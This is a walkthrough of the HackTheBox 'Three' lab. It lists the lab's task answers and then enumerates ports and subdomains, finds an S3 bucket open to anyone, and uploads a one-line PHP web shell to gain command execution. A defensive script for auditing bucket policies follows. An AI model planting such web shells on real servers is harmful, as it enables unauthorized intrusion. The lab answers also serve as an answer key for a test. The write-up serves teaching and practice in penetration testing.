Preface
Tier 1: Three
Using AWS
With this, Tier 1 free is complete.
Task1
How many TCP ports are open?
A:2
Start the scan:
nmap -A 10.129.141.55
Two ports are open: 22 and 80.
Task2
What is the domain of the email address provided in the "Contact" section of the website?
A:thetoppers.htb
Visit the website and look at the Contact section.
Task3
In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses in order to be able to access the websites that point to those hostnames?
A:/etc/hosts
Add the domain to the hosts file so that we can reach the site:
echo "10.129.141.55 thetoppers.htb" >> /etc/hosts
Task4
Which sub-domain is discovered during further enumeration?
A:s3.thetoppers.htb
Brute-force the subdomains:
gobuster vhost -u http://thetoppers.htb/ -w /usr/share/wordlists/dirb/big.txt --append-domain
One entry comes back with a 404; that is the one.
Task5
Which service is running on the discovered sub-domain?
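A:amazon s3
Add the s3 subdomain found above to the hosts file and visit it (I rebooted the target here, so the IP changed).
This was the most painful part: the server's s3 subdomain is extremely unstable and returns 502, and I waited several tens of minutes before I could connect.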
Task6
Which command line utility can be used to interact with the service running on the discovered sub-domain?
A:awscli
Task7
Which command is used to set up the AWS CLI installation?
A:aws configure
If aws throws an error here, update pyopenssl with pip.
Install the AWS CLI:
apt install awscli -y
Then configure it:
aws configure
Task8
What is the command used by the above utility to list all of the S3 buckets?
A:aws s3 ls
Task9
This server is configured to run files written in what web scripting language?
A:php
Submit Flag
Use the following command to connect to s3.thetoppers.htb through the specified S3 endpoint and list the objects in the thetoppers.htb bucket:
aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb
Next we write a web shell locally:
echo '<?php system($_GET["cmd"]); ?>' > shell.php
Upload it:
aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb
Then request the uploaded file to get a shell.
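The listing and upload above work against the bucket that backs the web root. As an added example that is not part of the original walkthrough, and assuming the equivalent exposure on a real S3 bucket comes from a bucket policy with a wildcard principal (the page does not show the target's policy), this check flags policy statements that let everyone list the bucket or upload to it. The names audit_policy, SAMPLE_POLICY and example-bucket are hypothetical.

```python
import fnmatch
import json

# The two operations the walkthrough performs: list the bucket, upload an object.
RISKY_ACTIONS = ("s3:ListBucket", "s3:PutObject")


def _as_list(value):
    """Policy fields may hold one value or a list of values."""
    return value if isinstance(value, list) else [value]


def _is_public(principal):
    """True for Principal "*" and for {"AWS": "*"} / {"AWS": ["*", ...]}."""
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS", []))
    return principal == "*"


def audit_policy(policy_json):
    """Return (sid, action, has_condition) per risky action granted to everyone."""
    findings = []
    statements = _as_list(json.loads(policy_json).get("Statement", []))
    for i, stmt in enumerate(statements):
        if stmt.get("Effect") != "Allow" or not _is_public(stmt.get("Principal")):
            continue
        patterns = [p.lower() for p in _as_list(stmt.get("Action", []))]
        for risky in RISKY_ACTIONS:
            # Action names are case-insensitive and may use * and ? wildcards.
            if any(fnmatch.fnmatchcase(risky.lower(), p) for p in patterns):
                sid = stmt.get("Sid", f"statement-{i}")
                findings.append((sid, risky, "Condition" in stmt))
    return findings

# Constructed sample policy for a hypothetical bucket, not the walkthrough's target.
ARN = "arn:aws:s3:::example-bucket"
SAMPLE_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
     "Action": "s3:GetObject", "Resource": ARN + "/*"},
    {"Sid": "PublicWrite", "Effect": "Allow", "Principal": {"AWS": "*"},
     "Action": ["s3:Put*", "s3:ListBucket"], "Resource": [ARN, ARN + "/*"]},
    {"Sid": "AdminOnly", "Effect": "Allow",
     "Principal": {"AWS": "arn:aws:iam::111122223333:root"},
     "Action": "s3:*", "Resource": [ARN, ARN + "/*"]},
]})

if __name__ == "__main__":
    for sid, action, has_condition in audit_policy(SAMPLE_POLICY):
        print(f"{sid}: {action} open to everyone (condition={has_condition})")
```

Statements that use NotPrincipal or NotAction are not evaluated by this check and need manual review.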